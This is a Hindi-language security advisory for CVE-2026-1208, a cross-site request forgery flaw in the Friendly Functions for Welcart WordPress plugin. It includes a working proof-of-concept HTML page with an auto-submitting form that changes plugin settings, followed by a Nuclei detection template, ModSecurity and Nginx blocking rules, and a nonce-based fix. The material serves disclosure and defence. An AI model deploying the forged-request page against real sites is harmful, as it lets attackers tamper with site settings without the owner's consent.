
Friendly Functions for Welcart <= 1.2.5 - सेटिंग्स अपडेट के लिए क्रॉस-साइट रिक्वेस्ट फोर्जरी
कीवर्ड्स: CVE-2026-1208, Friendly Functions for Welcart भेद्यता, CSRF, क्रॉस-साइट रिक्वेस्ट फोर्जरी, WordPress सुरक्षा, WordPress प्लगइन भेद्यता, CWE-352, Welcart सुरक्षा, सेटिंग्स हेरफेर, WordPress CVE 2026
Friendly Functions for Welcart WordPress प्लगइन CSRF भेद्यता (CVE-2026-1208) - सुरक्षा दोष जो अनधिकृत हमलावरों को जाली अनुरोधों के माध्यम से प्लगइन सेटिंग्स को संशोधित करने की अनुमति देता है।
Friendly Functions for Welcart प्लगइन में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता खोजी गई है जो अनधिकृत हमलावरों को किसी व्यवस्थापक को दुर्भावनापूर्ण लिंक पर क्लिक करने के लिए धोखा देकर प्लगइन सेटिंग्स को अपडेट करने की अनुमति देती है।
खोजकर्ता: Kai Aizen (SnailSploit)
प्रकाशित: 23 जनवरी, 2026
CVSS स्कोर: 4.3 (मध्यम)
CWE: CWE-352 - क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
प्लगइन: Friendly Functions for Welcart
अटैक प्रकार: सेटिंग्स अपडेट के लिए क्रॉस-साइट रिक्वेस्ट फोर्जरी
आवश्यक विशेषाधिकार: कोई नहीं (अनधिकृत अटैक + सोशल इंजीनियरिंग)
WordPress के लिए Friendly Functions for Welcart प्लगइन, 1.2.5 तक के सभी संस्करणों में क्रॉस-साइट रिक्वेस्ट फोर्जरी के प्रति संवेदनशील है। यह सेटिंग्स पेज पर गायब या गलत nonce सत्यापन के कारण होता है। इससे अनधिकृत हमलावरों के लिए जाली अनुरोध के माध्यम से प्लगइन सेटिंग्स को अपडेट करना संभव हो जाता है, बशर्ते वे किसी साइट व्यवस्थापक को लिंक पर क्लिक करने जैसी कार्रवाई करने के लिए धोखा दे सकें।
यह भेद्यता अनधिकृत हमलावरों को निम्नलिखित की अनुमति देती है:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
भेद्यता सेटिंग्स पेज के कार्यान्वयन में मौजूद है जहाँ:
भेद्यता निम्नलिखित स्थानों पर पहचानी गई थी:
ffw_function_settings.php - लाइन 53ffw_function_settings.php - लाइन 58हमले के लिए सोशल इंजीनियरिंग की आवश्यकता होती है ताकि एक प्रमाणित व्यवस्थापक को अपनी WordPress साइट में लॉग इन होने के दौरान किसी दुर्भावनापूर्ण पेज पर जाने या निर्मित लिंक पर क्लिक करने के लिए धोखा दिया जा सके।
Target: WordPress Admin with Friendly Functions for Welcart installed
Method: Malicious HTML page with auto-submitting form
Trigger: Administrator clicks link or visits attacker-controlled page
<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
<h1>Loading...</h1>
<form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
<input type="hidden" name="ffw_setting_option" value="malicious_value" />
<!-- Add additional setting fields as needed -->
</form>
<script>
document.getElementById('csrf-form').submit();
</script>
</body>
</html>
⚠️ चेतावनी: यह PoC केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"
# Get specific version
wp plugin get friendly-functions-for-welcart --field=version
Nuclei टेम्पलेट:
id: CVE-2026-1208
info:
name: Friendly Functions for Welcart - CSRF to Settings Update
author: SnailSploit
severity: medium
description: |
Friendly Functions for Welcart plugin for WordPress is vulnerable
to CSRF in versions <= 1.2.5 due to missing nonce validation.
reference:
- https://github.com/SnailSploit/CVE-2026-1208
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2026-1208
cwe-id: CWE-352
tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "Friendly Functions for Welcart"
- type: regex
regex:
- "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- "(?i)Stable tag:\\s*([0-9.]+)"
ModSecurity नियम:
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule &REQUEST_HEADERS:Referer "@eq 0"
# Alternative: Block if referer doesn't match site domain
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026002,phase:2,t:none,\
log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"
Nginx नियम:
# CVE-2026-1208 - CSRF Protection for FFW Settings
location /wp-admin/admin.php {
# Check for ffw-settings page without proper referer
if ($arg_page = "ffw-settings") {
set $csrf_check "1";
}
if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
set $csrf_check "${csrf_check}1";
}
if ($csrf_check = "11") {
return 403;
}
# Pass to PHP handler
try_files $uri =404;
fastcgi_pass php-fpm;
include fastcgi_params;
}
तत्काल आवश्यक कार्रवाई:
सुनिश्चित करें कि सभी सेटिंग्स फॉर्म उचित CSRF सुरक्षा लागू करते हैं:
// Example of proper CSRF protection in WordPress
// In your form:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');
// In your form handler:
function process_settings_update() {
// Verify nonce
if (!isset($_POST['ffw_settings_nonce']) ||
!wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
wp_die('Security check failed');
}
// Check capabilities
if (!current_user_can('manage_options')) {
wp_die('Unauthorized');
}
// Process settings update
// ...
}
शोधकर्ता:
प्रकटीकरण प्रक्रिया: Wordfence बग बाउंटी कार्यक्रम के माध्यम से समन्वित
यह जानकारी केवल सुरक्षा अनुसंधान और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है। दुर्भावनापूर्ण उद्देश्यों के लिए इस भेद्यता का कोई भी शोषण अवैध और अनैतिक है। उन सिस्टमों का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें जिनके आप स्वामी नहीं हैं।
इस भेद्यता के बारे में प्रश्नों या अतिरिक्त जानकारी के लिए:
अंतिम अपडेट: 23 जनवरी, 2026
इस परियोजना का पूर्ण विवरण, कार्यप्रणाली और संबंधित शोध यहाँ उपलब्ध है:
https://snailsploit.com/security-research/cves/cve-2026-1208/
Kai Aizen द्वारा निर्मित — स्वतंत्र आक्रामक सुरक्षा शोधकर्ता।
snailsploit.com · शोध · फ्रेमवर्क्स · GitHub · LinkedIn · ResearchGate · X/Twitter
वही हमला। अलग सब्सट्रेट।
| मीट्रिक | मान |
|---|
| अटैक वेक्टर | नेटवर्क (AV:N) |
| अटैक जटिलता | निम्न (AC:L) |
| आवश्यक विशेषाधिकार | कोई नहीं (PR:N) |
| उपयोगकर्ता सहभागिता | आवश्यक (UI:R) |
| स्कोप | अपरिवर्तित (S:U) |
| गोपनीयता | कोई नहीं (C:N) |
| अखंडता | निम्न (I:L) |
| उपलब्धता | कोई नहीं (A:N) |